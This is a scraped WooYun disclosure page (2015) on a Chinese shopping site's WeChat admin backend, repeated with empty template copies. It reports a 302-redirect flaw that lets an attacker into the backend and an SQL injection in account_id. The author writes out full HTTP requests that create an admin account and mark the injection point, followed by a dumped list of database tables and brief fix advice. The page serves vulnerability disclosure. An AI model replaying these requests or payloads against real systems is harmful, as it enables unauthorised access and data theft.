优购物某后台未授权访问和MySQL注射 | wooyun-2015-0113875| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0113875

漏洞标题：优购物某后台未授权访问和MySQL注射

漏洞作者：路人甲

提交时间：2015-05-13 12:46

修复时间：2015-06-27 14:36

公开时间：2015-06-27 14:36

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-05-13：细节已通知厂商并且等待厂商处理中
2015-05-13：厂商已经确认，细节仅向厂商公开
2015-05-23：细节向核心白帽子及相关领域专家公开
2015-06-02：细节向普通白帽子公开
2015-06-12：细节向实习白帽子公开
2015-06-27：细节向公众公开

简要描述：

优购物某后台未授权访问和MySQL注射

详细说明：

漏洞1,302绕过
302跳转未exit，扔输出了页面内容，可以直接访问后台，把返回的302改成200即可。

示例添加个wooyun，密码wooyun的账号，顺利进入后台：

POST http://weixin.17ugo.com/index.php/system/account_saveaccount.php HTTP/1.1
Host: weixin.17ugo.com
Proxy-Connection: keep-alive
Content-Length: 129
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://weixin.17ugo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://weixin.17ugo.com/index.php/system/account_newaccount.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: tanchu=1; __ozlvd1687=1431490775; _ga=GA1.2.176173063.1431489248; Hm_lvt_7b74f5f61e55127b3a8e6c0f8a2eed17=1431489248; Hm_lpvt_7b74f5f61e55127b3a8e6c0f8a2eed17=1431490776; NTKF_T2D_CLIENTID=guestA0E8E9FA-3ADA-86A7-38B7-4B68833B15F2; nTalk_CACHE_DATA={uid:kf_9715_ISME9754_guestA0E8E9FA-3ADA-86,tid:1431489248352962,onlyone:1}; __utma=232567135.176173063.1431489248.1431489249.1431489249.1; __utmb=232567135.2.10.1431489249; __utmc=232567135; __utmz=232567135.1431489249.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); nTalk_PAGE_MANAGE={|m|:[],|t|:|12:25:21|}; ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2262ec6d7076c52987ddf0fd109027df21%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.1.1.22%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A109%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F42.0.2311.135+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1431491396%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22authcode%22%3Bs%3A4%3A%225981%22%3B%7D464c98229bae00440f0a77172e4e82e2
account_id=&account_name=wooyun&account_role=1&account_new_passwd_1=wooyun&account_new_passwd_2=wooyun&account_description=wooyun

注射点多个，参数均为account_id：

POST /index.php/system/account_saveaccount.php HTTP/1.1
Content-Length: 447
Content-Type: application/x-www-form-urlencoded
Cookie: ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%227a321192c2030a4d159f93fe87de5c56%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.1.1.22%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28iPhone%3B+CPU
+iPhone+OS+8_0+like+Mac+OS+X%29+AppleWebKit%2F600.1.3+%28KHTML%2C+like+Gecko%29+Version%2F8.0+Mobile%2F12A4345%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1431453432%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22authcode%22%3Bs
%3A4%3A%225276%22%3B%7D75360e9880cbd02fb9d5db92f4114d41
Host: weixin.17ugo.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4
Accept: */*
account_description=111111&account_id=*&account_name=test&account_new_passwd_1=test&account_new_passwd_2=test&account_role=-

漏洞证明：

current user:    'wechat@127.0.0.1'
Database: wx2
[278 tables]
+------------------------------------+
| app_coupon_desc                    |
| wx_account                         |
| wx_account_assigned_message        |
| wx_account_reply_message           |
| wx_account_reply_message_00        |
| wx_account_reply_message_01        |
| wx_account_reply_message_02        |
| wx_account_reply_message_03        |
| wx_account_reply_message_04        |
| wx_account_reply_message_05        |
| wx_account_reply_message_06        |
| wx_account_reply_message_07        |
| wx_account_reply_message_08        |
| wx_account_reply_message_09        |
| wx_account_reply_message_10        |
| wx_account_reply_message_11        |
| wx_account_reply_message_12        |
| wx_account_reply_message_13        |
| wx_account_reply_message_14        |
| wx_account_reply_message_15        |
| wx_account_reply_message_16        |
| wx_account_reply_message_17        |
| wx_account_reply_message_18        |
| wx_account_reply_message_19        |
| wx_account_reply_message_20        |
| wx_account_reply_message_21        |
| wx_account_reply_message_22        |
| wx_account_reply_message_23        |
| wx_account_reply_message_24        |
| wx_account_reply_message_25        |
| wx_account_reply_message_26        |
| wx_account_reply_message_27        |
| wx_account_reply_message_28        |
| wx_account_reply_message_29        |
| wx_account_reply_message_30        |
| wx_account_reply_message_31        |
| wx_account_reply_message_32        |
| wx_account_reply_message_33        |
| wx_account_reply_message_34        |
| wx_account_reply_message_35        |
| wx_account_reply_message_36        |
| wx_account_reply_message_37        |
| wx_account_reply_message_38        |
| wx_account_reply_message_39        |
| wx_account_reply_message_40        |
| wx_account_reply_message_41        |
| wx_account_reply_message_42        |
| wx_account_reply_message_43        |
| wx_account_reply_message_44        |
| wx_account_reply_message_45        |
| wx_account_reply_message_46        |
| wx_account_reply_message_47        |
| wx_account_reply_message_48        |
| wx_account_reply_message_49        |
| wx_account_reply_message_50        |
| wx_account_reply_message_51        |
| wx_account_reply_message_52        |
| wx_account_reply_message_53        |
| wx_account_reply_message_54        |
| wx_account_reply_message_55        |
| wx_account_reply_message_56        |
| wx_account_reply_message_57        |
| wx_account_reply_message_58        |
| wx_account_reply_message_59        |
| wx_account_reply_message_60        |
| wx_account_reply_message_61        |
| wx_account_reply_message_62        |
| wx_account_reply_message_63        |
| wx_account_reply_message_64        |
| wx_account_reply_message_65        |
| wx_account_reply_message_66        |
| wx_account_reply_message_67        |
| wx_account_reply_message_68        |
| wx_account_reply_message_69        |
| wx_account_reply_message_70        |
| wx_account_reply_message_71        |
| wx_account_reply_message_72        |
| wx_account_reply_message_73        |
| wx_account_reply_message_74        |
| wx_account_reply_message_75        |
| wx_account_reply_message_76        |
| wx_account_reply_message_77        |
| wx_account_reply_message_78        |
| wx_account_reply_message_79        |
| wx_account_reply_message_80        |
| wx_account_reply_message_81        |
| wx_account_reply_message_82        |
| wx_account_reply_message_83        |
| wx_account_reply_message_84        |
| wx_account_reply_message_85        |
| wx_account_reply_message_86        |
| wx_account_reply_message_87        |
| wx_account_reply_message_88        |
| wx_account_reply_message_89        |
| wx_account_reply_message_90        |
| wx_account_reply_message_91        |
| wx_account_reply_message_92        |
| wx_account_reply_message_93        |
| wx_account_reply_message_94        |
| wx_account_reply_message_95        |
| wx_account_reply_message_96        |
| wx_account_reply_message_97        |
| wx_account_reply_message_98        |
| wx_account_reply_message_99        |
| wx_add_auto_reply_message          |
| wx_app_download                    |
| wx_assemble_auto_reply_message     |
| wx_auto_reply_message              |
| wx_banner                          |
| wx_brand_day                       |
| wx_column                          |
| wx_column_list                     |
| wx_dialog_message                  |
| wx_dialog_user                     |
| wx_district                        |
| wx_examine                         |
| wx_goods                           |
| wx_group                           |
| wx_group_message                   |
| wx_important_user                  |
| wx_jfgz                            |
| wx_keyword                         |
| wx_keyword_auto_reply_message      |
| wx_keyword_reply_rule              |
| wx_materials                       |
| wx_menu                            |
| wx_menu_message                    |
| wx_menu_publish_time               |
| wx_message                         |
| wx_message_00                      |
| wx_message_01                      |
| wx_message_02                      |
| wx_message_03                      |
| wx_message_04                      |
| wx_message_05                      |
| wx_message_06                      |
| wx_message_07                      |
| wx_message_08                      |
| wx_message_09                      |
| wx_message_10                      |
| wx_message_11                      |
| wx_message_12                      |
| wx_message_13                      |
| wx_message_14                      |
| wx_message_15                      |
| wx_message_16                      |
| wx_message_17                      |
| wx_message_18                      |
| wx_message_19                      |
| wx_message_20                      |
| wx_message_21                      |
| wx_message_22                      |
| wx_message_23                      |
| wx_message_24                      |
| wx_message_25                      |
| wx_message_26                      |
| wx_message_27                      |
| wx_message_28                      |
| wx_message_29                      |
| wx_message_30                      |
| wx_message_31                      |
| wx_message_32                      |
| wx_message_33                      |
| wx_message_34                      |
| wx_message_35                      |
| wx_message_36                      |
| wx_message_37                      |
| wx_message_38                      |
| wx_message_39                      |
| wx_message_40                      |
| wx_message_41                      |
| wx_message_42                      |
| wx_message_43                      |
| wx_message_44                      |
| wx_message_45                      |
| wx_message_46                      |
| wx_message_47                      |
| wx_message_48                      |
| wx_message_49                      |
| wx_message_50                      |
| wx_message_51                      |
| wx_message_52                      |
| wx_message_53                      |
| wx_message_54                      |
| wx_message_55                      |
| wx_message_56                      |
| wx_message_57                      |
| wx_message_58                      |
| wx_message_59                      |
| wx_message_60                      |
| wx_message_61                      |
| wx_message_62                      |
| wx_message_63                      |
| wx_message_64                      |
| wx_message_65                      |
| wx_message_66                      |
| wx_message_67                      |
| wx_message_68                      |
| wx_message_69                      |
| wx_message_70                      |
| wx_message_71                      |
| wx_message_72                      |
| wx_message_73                      |
| wx_message_74                      |
| wx_message_75                      |
| wx_message_76                      |
| wx_message_77                      |
| wx_message_78                      |
| wx_message_79                      |
| wx_message_80                      |
| wx_message_81                      |
| wx_message_82                      |
| wx_message_83                      |
| wx_message_84                      |
| wx_message_85                      |
| wx_message_86                      |
| wx_message_87                      |
| wx_message_88                      |
| wx_message_89                      |
| wx_message_90                      |
| wx_message_91                      |
| wx_message_92                      |
| wx_message_93                      |
| wx_message_94                      |
| wx_message_95                      |
| wx_message_96                      |
| wx_message_97                      |
| wx_message_98                      |
| wx_message_99                      |
| wx_message_contrast                |
| wx_message_count                   |
| wx_message_id                      |
| wx_message_tag                     |
| wx_message_tag_relation            |
| wx_message_time                    |
| wx_message_total_statistics        |
| wx_message_type                    |
| wx_mixed_materials                 |
| wx_node                            |
| wx_node_copy                       |
| wx_node_copy_bak                   |
| wx_notice                          |
| wx_notice_rule                     |
| wx_notice_time_copy                |
| wx_online_customer                 |
| wx_openid_accountid                |
| wx_operation_log                   |
| wx_operation_type                  |
| wx_role                            |
| wx_sale_time                       |
| wx_send_moon                       |
| wx_send_msgid                      |
| wx_statistics_important_user       |
| wx_statistics_keyword_reply_msg    |
| wx_statistics_new_subscirbe_msg    |
| wx_statistics_new_subscribe_user   |
| wx_statistics_notkeyword_reply_msg |
| wx_statistics_total_account        |
| wx_statistics_total_msg            |
| wx_statistics_total_user           |
| wx_statistics_unsubscribe_user     |
| wx_subscribe_reply_message         |
| wx_tag                             |
| wx_today_half                      |
| wx_today_live                      |
| wx_tvdialog_message                |
| wx_tvdialog_user                   |
| wx_unmatch_user_reply_message      |
| wx_user                            |
| wx_user_bind                       |
| wx_user_contrast                   |
| wx_user_tag                        |
| wx_user_total_statistics           |
| wx_week_broad                      |
| wx_weekbroad                       |
| wx_welcomemsg                      |
| wx_wxaccount                       |
| wx_zxkf                            |
+------------------------------------+

修复方案：

输出302后exit
参数过滤，解决SQL注射

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：18

确认时间：2015-05-13 14:35

厂商回复：

感谢您的关注，漏洞正在修复。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0113875

漏洞标题：优购物某后台未授权访问和MySQL注射

相关厂商：北京优购文化发展有限公司

漏洞作者：路人甲

提交时间：2015-05-13 12:46

修复时间：2015-06-27 14:36

公开时间：2015-06-27 14:36

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0113875

漏洞标题：优购物某后台未授权访问和MySQL注射

相关厂商：北京优购文化发展有限公司

漏洞作者： 路人甲

提交时间：2015-05-13 12:46

修复时间：2015-06-27 14:36

公开时间：2015-06-27 14:36

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0113875"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云